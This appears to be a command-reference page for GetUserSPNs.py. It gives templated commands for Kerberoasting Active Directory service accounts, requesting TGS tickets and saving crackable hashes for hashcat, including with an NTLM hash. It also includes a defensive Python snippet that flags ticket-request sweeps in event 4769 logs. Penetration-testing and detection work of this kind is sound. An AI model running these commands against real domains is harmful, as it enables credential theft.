Linux command
getuserspns.py command
Network
After copying, replace file names, directories, or parameters as needed.
Common examples
Enumerate SPN accounts
GetUserSPNs.py [domain]/[username]:[password] -dc-ip [dc_ip]
Request service tickets
GetUserSPNs.py [domain]/[username]:[password] -dc-ip [dc_ip] -request
Output for hashcat
GetUserSPNs.py [domain]/[username]:[password] -dc-ip [dc_ip] -request -outputfile [hashes.txt]
Using NTLM hash
GetUserSPNs.py [domain]/[username] -hashes :[ntlm_hash] -dc-ip [dc_ip]
Description
GetUserSPNs.py performs Kerberoasting attacks against Active Directory. It identifies service accounts with SPNs and requests service tickets containing crackable password hashes. The tool queries AD for accounts with servicePrincipalName attributes, then requests TGS tickets. These tickets contain password material crackable offline. GetUserSPNs.py is used in penetration testing for credential attacks.
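From the defender's side, the service ticket requests described above are logged on the domain controller as Security event 4769. The following is an added example, not part of the original page or of the tool: it flags an account that requests RC4-encrypted tickets for several distinct service accounts within a short window. The sample events, account names, threshold, and window are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17                 # ticket encryption type value for RC4-HMAC
WINDOW = timedelta(minutes=5)   # assumed tuning value
THRESHOLD = 3                   # assumed: distinct services per requester per window

# Constructed sample of event 4769 fields (not real log data):
# (time, TargetUserName, ServiceName, TicketEncryptionType)
SAMPLE_EVENTS = [
    ("2024-05-01T10:00:01", "jdoe@CORP.EXAMPLE", "svc_sql", "0x17"),
    ("2024-05-01T10:00:02", "jdoe@CORP.EXAMPLE", "svc_web", "0x17"),
    ("2024-05-01T10:00:03", "jdoe@CORP.EXAMPLE", "svc_backup", "0x17"),
    ("2024-05-01T10:01:00", "alice@CORP.EXAMPLE", "svc_web", "0x12"),
    ("2024-05-01T10:01:05", "alice@CORP.EXAMPLE", "FILESRV01$", "0x17"),
    ("2024-05-01T10:00:00", "bob@CORP.EXAMPLE", "svc_sql", "0x17"),
    ("2024-05-01T11:00:00", "bob@CORP.EXAMPLE", "svc_web", "0x17"),
    ("2024-05-01T12:00:00", "bob@CORP.EXAMPLE", "svc_backup", "0x17"),
]

def find_spn_sweeps(events, window=WINDOW, threshold=THRESHOLD):
    """Return {requester: sorted service names} for accounts that requested
    RC4 tickets for >= threshold distinct user-account services in one window."""
    per_user = defaultdict(list)
    for time, requester, service, etype in events:
        if int(etype, 16) != RC4_HMAC:
            continue  # AES-encrypted tickets are outside this heuristic
        if service.endswith("$") or service.lower() == "krbtgt":
            continue  # machine accounts and krbtgt are not user-set passwords
        per_user[requester].append((datetime.fromisoformat(time), service))

    flagged = {}
    for requester, requests in per_user.items():
        requests.sort()
        # Slide a window starting at each request and count distinct services.
        for i, (start, _) in enumerate(requests):
            seen = {svc for t, svc in requests[i:] if t - start <= window}
            if len(seen) >= threshold:
                flagged[requester] = sorted(seen)
                break
    return flagged

if __name__ == "__main__":
    for requester, services in find_spn_sweeps(SAMPLE_EVENTS).items():
        print(f"possible Kerberoasting: {requester} requested {services}")
```

The threshold and window need tuning against the normal ticket request volume of the environment before this is used for alerting.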
Parameters
- `-dc-ip` _IP_: Domain controller IP.
- `-request`: Request TGS tickets.
- `-hashes` _LMHASH:NTHASH_: Use NTLM hashes.
- `-outputfile` _FILE_: Output file for hashes.
- `--help`: Display help information.
FAQ
What is the getuserspns.py command used for?
GetUserSPNs.py performs Kerberoasting attacks against Active Directory. It identifies service accounts with SPNs and requests service tickets containing crackable password hashes. The tool queries AD for accounts with servicePrincipalName attributes, then requests TGS tickets. These tickets contain password material crackable offline. GetUserSPNs.py is used in penetration testing for credential attacks.
How do I run a basic getuserspns.py example?
Run `GetUserSPNs.py [domain]/[username]:[password] -dc-ip [dc_ip]` in a terminal, then adjust file names, paths, flags, or remote targets for your system.
What does -dc-ip _IP_ do in getuserspns.py?
Domain controller IP.